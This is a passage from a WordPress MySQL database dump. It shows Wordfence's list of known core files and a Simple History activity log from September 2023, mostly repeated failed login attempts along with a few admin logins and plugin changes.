-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(17497,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php','wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(17498,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php','wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(17499,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(17500,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(17501,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(17502,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php','wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(17503,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php','wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(17504,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php','wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(17505,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php','wp-includes/sodium_compat/namespaced/Core/Util.php'),(17506,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php','wp-includes/sodium_compat/namespaced/Core/X25519.php'),(17507,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(17508,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(17509,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/Crypto.php','wp-includes/sodium_compat/namespaced/Crypto.php'),(17510,'/home/eckank5/public_html/wp-includes/sodium_compat/namespaced/File.php','wp-includes/sodium_compat/namespaced/File.php'),(17511,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Compat.php','wp-includes/sodium_compat/src/Compat.php'),(17512,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/BLAKE2b.php','wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(17513,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Base64/Common.php','wp-includes/sodium_compat/src/Core/Base64/Common.php'),(17514,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Base64/Original.php','wp-includes/sodium_compat/src/Core/Base64/Original.php'),(17515,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(17516,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(17517,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(17518,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/ChaCha20.php','wp-includes/sodium_compat/src/Core/ChaCha20.php'),(17519,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(17520,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(17521,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(17522,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(17523,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(17524,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(17525,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/H.php','wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(17526,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519/README.md','wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(17527,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Curve25519.php','wp-includes/sodium_compat/src/Core/Curve25519.php'),(17528,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Ed25519.php','wp-includes/sodium_compat/src/Core/Ed25519.php'),(17529,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/HChaCha20.php','wp-includes/sodium_compat/src/Core/HChaCha20.php'),(17530,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/HSalsa20.php','wp-includes/sodium_compat/src/Core/HSalsa20.php'),(17531,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Poly1305/State.php','wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(17532,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Poly1305.php','wp-includes/sodium_compat/src/Core/Poly1305.php'),(17533,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Ristretto255.php','wp-includes/sodium_compat/src/Core/Ristretto255.php'),(17534,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Salsa20.php','wp-includes/sodium_compat/src/Core/Salsa20.php'),(17535,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/SecretStream/State.php','wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(17536,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/SipHash.php','wp-includes/sodium_compat/src/Core/SipHash.php'),(17537,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/Util.php','wp-includes/sodium_compat/src/Core/Util.php'),(17538,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/X25519.php','wp-includes/sodium_compat/src/Core/X25519.php'),(17539,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/XChaCha20.php','wp-includes/sodium_compat/src/Core/XChaCha20.php'),(17540,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core/XSalsa20.php','wp-includes/sodium_compat/src/Core/XSalsa20.php'),(17541,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/BLAKE2b.php','wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(17542,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(17543,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(17544,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20.php','wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(17545,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(17546,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(17547,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(17548,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(17549,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(17550,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(17551,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/H.php','wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(17552,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/README.md','wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(17553,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Curve25519.php','wp-includes/sodium_compat/src/Core32/Curve25519.php'),(17554,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Ed25519.php','wp-includes/sodium_compat/src/Core32/Ed25519.php'),(17555,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/HChaCha20.php','wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(17556,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/HSalsa20.php','wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(17557,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Int32.php','wp-includes/sodium_compat/src/Core32/Int32.php'),(17558,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Int64.php','wp-includes/sodium_compat/src/Core32/Int64.php'),(17559,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Poly1305/State.php','wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(17560,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Poly1305.php','wp-includes/sodium_compat/src/Core32/Poly1305.php'),(17561,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Salsa20.php','wp-includes/sodium_compat/src/Core32/Salsa20.php'),(17562,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/SecretStream/State.php','wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(17563,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/SipHash.php','wp-includes/sodium_compat/src/Core32/SipHash.php'),(17564,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/Util.php','wp-includes/sodium_compat/src/Core32/Util.php'),(17565,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/X25519.php','wp-includes/sodium_compat/src/Core32/X25519.php'),(17566,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/XChaCha20.php','wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(17567,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Core32/XSalsa20.php','wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(17568,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Crypto.php','wp-includes/sodium_compat/src/Crypto.php'),(17569,'/home/eckank5/public_html/wp-includes/sodium_compat/src/Crypto32.php','wp-includes/sodium_compat/src/Crypto32.php'),(17570,'/home/eckank5/public_html/wp-includes/sodium_compat/src/File.php','wp-includes/sodium_compat/src/File.php'),(17571,'/home/eckank5/public_html/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(17572,'/home/eckank5/public_html/wp-includes/sodium_compat/src/SodiumException.php','wp-includes/sodium_compat/src/SodiumException.php'),(17573,'/home/eckank5/public_html/wp-includes/spl-autoload-compat.php','wp-includes/spl-autoload-compat.php'),(17574,'/home/eckank5/public_html/wp-includes/style-engine/class-wp-style-engine-css-declarations.php','wp-includes/style-engine/class-wp-style-engine-css-declarations.php'),(17575,'/home/eckank5/public_html/wp-includes/style-engine/class-wp-style-engine-css-rule.php','wp-includes/style-engine/class-wp-style-engine-css-rule.php'),(17576,'/home/eckank5/public_html/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php','wp-includes/style-engine/class-wp-style-engine-css-rules-store.php'),(17577,'/home/eckank5/public_html/wp-includes/style-engine/class-wp-style-engine-processor.php','wp-includes/style-engine/class-wp-style-engine-processor.php'),(17578,'/home/eckank5/public_html/wp-includes/style-engine/class-wp-style-engine.php','wp-includes/style-engine/class-wp-style-engine.php'),(17579,'/home/eckank5/public_html/wp-includes/style-engine.php','wp-includes/style-engine.php'),(17580,'/home/eckank5/public_html/wp-includes/taxonomy.php','wp-includes/taxonomy.php'),(17581,'/home/eckank5/public_html/wp-includes/template-canvas.php','wp-includes/template-canvas.php'),(17582,'/home/eckank5/public_html/wp-includes/template-loader.php','wp-includes/template-loader.php'),(17583,'/home/eckank5/public_html/wp-includes/template.php','wp-includes/template.php'),(17584,'/home/eckank5/public_html/wp-includes/theme-compat/comments.php','wp-includes/theme-compat/comments.php'),(17585,'/home/eckank5/public_html/wp-includes/theme-compat/embed-404.php','wp-includes/theme-compat/embed-404.php'),(17586,'/home/eckank5/public_html/wp-includes/theme-compat/embed-content.php','wp-includes/theme-compat/embed-content.php'),(17587,'/home/eckank5/public_html/wp-includes/theme-compat/embed.php','wp-includes/theme-compat/embed.php'),(17588,'/home/eckank5/public_html/wp-includes/theme-compat/footer-embed.php','wp-includes/theme-compat/footer-embed.php'),(17589,'/home/eckank5/public_html/wp-includes/theme-compat/footer.php','wp-includes/theme-compat/footer.php'),(17590,'/home/eckank5/public_html/wp-includes/theme-compat/header-embed.php','wp-includes/theme-compat/header-embed.php'),(17591,'/home/eckank5/public_html/wp-includes/theme-compat/header.php','wp-includes/theme-compat/header.php'),(17592,'/home/eckank5/public_html/wp-includes/theme-compat/sidebar.php','wp-includes/theme-compat/sidebar.php'),(17593,'/home/eckank5/public_html/wp-includes/theme-i18n.json','wp-includes/theme-i18n.json'),(17594,'/home/eckank5/public_html/wp-includes/theme-previews.php','wp-includes/theme-previews.php'),(17595,'/home/eckank5/public_html/wp-includes/theme-templates.php','wp-includes/theme-templates.php'),(17596,'/home/eckank5/public_html/wp-includes/theme.json','wp-includes/theme.json'),(17597,'/home/eckank5/public_html/wp-includes/theme.php','wp-includes/theme.php'),(17598,'/home/eckank5/public_html/wp-includes/update.php','wp-includes/update.php'),(17599,'/home/eckank5/public_html/wp-includes/user.php','wp-includes/user.php'),(17600,'/home/eckank5/public_html/wp-includes/vars.php','wp-includes/vars.php'),(17601,'/home/eckank5/public_html/wp-includes/version.php','wp-includes/version.php'),(17602,'/home/eckank5/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php','wp-includes/widgets/class-wp-nav-menu-widget.php'),(17603,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-archives.php','wp-includes/widgets/class-wp-widget-archives.php'),(17604,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-block.php','wp-includes/widgets/class-wp-widget-block.php'),(17605,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-calendar.php','wp-includes/widgets/class-wp-widget-calendar.php'),(17606,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-categories.php','wp-includes/widgets/class-wp-widget-categories.php'),(17607,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-custom-html.php','wp-includes/widgets/class-wp-widget-custom-html.php'),(17608,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-links.php','wp-includes/widgets/class-wp-widget-links.php'),(17609,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-media-audio.php','wp-includes/widgets/class-wp-widget-media-audio.php'),(17610,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php','wp-includes/widgets/class-wp-widget-media-gallery.php'),(17611,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-media-image.php','wp-includes/widgets/class-wp-widget-media-image.php'),(17612,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-media-video.php','wp-includes/widgets/class-wp-widget-media-video.php'),(17613,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-media.php','wp-includes/widgets/class-wp-widget-media.php'),(17614,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-meta.php','wp-includes/widgets/class-wp-widget-meta.php'),(17615,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-pages.php','wp-includes/widgets/class-wp-widget-pages.php'),(17616,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php','wp-includes/widgets/class-wp-widget-recent-comments.php'),(17617,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php','wp-includes/widgets/class-wp-widget-recent-posts.php'),(17618,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-rss.php','wp-includes/widgets/class-wp-widget-rss.php'),(17619,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-search.php','wp-includes/widgets/class-wp-widget-search.php'),(17620,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php','wp-includes/widgets/class-wp-widget-tag-cloud.php'),(17621,'/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-text.php','wp-includes/widgets/class-wp-widget-text.php'),(17622,'/home/eckank5/public_html/wp-includes/widgets.php','wp-includes/widgets.php'),(17623,'/home/eckank5/public_html/wp-includes/wp-db.php','wp-includes/wp-db.php'),(17624,'/home/eckank5/public_html/wp-includes/wp-diff.php','wp-includes/wp-diff.php'),(17625,'/home/eckank5/public_html/wp-links-opml.php','wp-links-opml.php'),(17626,'/home/eckank5/public_html/wp-load.php','wp-load.php'),(17627,'/home/eckank5/public_html/wp-login.php','wp-login.php'),(17628,'/home/eckank5/public_html/wp-mail.php','wp-mail.php'),(17629,'/home/eckank5/public_html/wp-settings.php','wp-settings.php'),(17630,'/home/eckank5/public_html/wp-signup.php','wp-signup.php'),(17631,'/home/eckank5/public_html/wp-trackback.php','wp-trackback.php'),(17632,'/home/eckank5/public_html/xmlrpc.php','xmlrpc.php');
/*!40000 ALTER TABLE `wpcl_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfknownfilelist` with 17632 row(s)
--

--
-- Table structure for table `wpcl_simple_history`
--

DROP TABLE IF EXISTS `wpcl_simple_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_simple_history` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL,
  `logger` varchar(30) DEFAULT NULL,
  `level` varchar(20) DEFAULT NULL,
  `message` varchar(255) DEFAULT NULL,
  `occasionsID` varchar(32) DEFAULT NULL,
  `initiator` varchar(16) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `date` (`date`),
  KEY `loggerdate` (`logger`,`date`)
) ENGINE=MyISAM AUTO_INCREMENT=41236 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_simple_history`
--

LOCK TABLES `wpcl_simple_history` WRITE;
/*!40000 ALTER TABLE `wpcl_simple_history` DISABLE KEYS */;
INSERT INTO `wpcl_simple_history` VALUES (35067,'2023-09-22 19:58:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35068,'2023-09-22 20:10:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35069,'2023-09-22 20:21:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35070,'2023-09-22 20:24:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35071,'2023-09-22 20:32:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4a4655c4993409e88d4d7f3c733b8bc0','other'),(35072,'2023-09-22 20:32:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35073,'2023-09-22 20:44:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35074,'2023-09-22 20:55:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35075,'2023-09-22 21:07:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35076,'2023-09-22 21:19:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35077,'2023-09-22 21:21:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35078,'2023-09-22 21:30:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35079,'2023-09-22 21:42:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35080,'2023-09-22 21:53:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35081,'2023-09-22 22:05:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35082,'2023-09-22 22:16:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35083,'2023-09-22 22:19:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35084,'2023-09-22 22:28:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35085,'2023-09-22 22:40:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35086,'2023-09-22 22:52:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35087,'2023-09-22 23:03:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35088,'2023-09-22 23:15:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35089,'2023-09-22 23:16:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35090,'2023-09-22 23:27:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35091,'2023-09-22 23:39:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35092,'2023-09-22 23:51:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35093,'2023-09-23 00:03:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35094,'2023-09-23 00:15:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35095,'2023-09-23 00:15:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35096,'2023-09-23 00:26:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35097,'2023-09-23 00:38:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35098,'2023-09-23 00:50:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35099,'2023-09-23 01:02:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35100,'2023-09-23 01:10:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35101,'2023-09-23 01:14:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35102,'2023-09-23 01:26:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35103,'2023-09-23 01:37:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35104,'2023-09-23 01:49:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35105,'2023-09-23 02:01:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35106,'2023-09-23 02:08:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35107,'2023-09-23 02:13:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35108,'2023-09-23 02:25:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35109,'2023-09-23 02:37:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35110,'2023-09-23 02:48:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35111,'2023-09-23 03:00:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35112,'2023-09-23 03:08:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35113,'2023-09-23 03:12:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35114,'2023-09-23 03:23:59','SimpleUserLogger','info','Logged in','ed4d6d72602b2a597b7f72e0f5f605e7','wp_user'),(35115,'2023-09-23 03:24:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35116,'2023-09-23 03:24:57','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','0ad42d0c92bd9507b58e5dd998b87f94','wp_user'),(35117,'2023-09-23 03:29:01','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','bb6ca223b1b260637e843ad96b250463','wp_user'),(35118,'2023-09-23 03:29:40','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(35119,'2023-09-23 03:36:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35120,'2023-09-23 03:48:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35121,'2023-09-23 04:00:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35122,'2023-09-23 04:02:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35123,'2023-09-23 04:12:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35124,'2023-09-23 04:56:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35125,'2023-09-23 05:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35126,'2023-09-23 06:49:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35127,'2023-09-23 07:48:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35128,'2023-09-23 08:47:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35129,'2023-09-23 09:47:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35130,'2023-09-23 09:54:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c0f9a6a83100ff718365e606b53d7478','other'),(35131,'2023-09-23 10:45:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(35132,'2023-09-23 11:58:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not 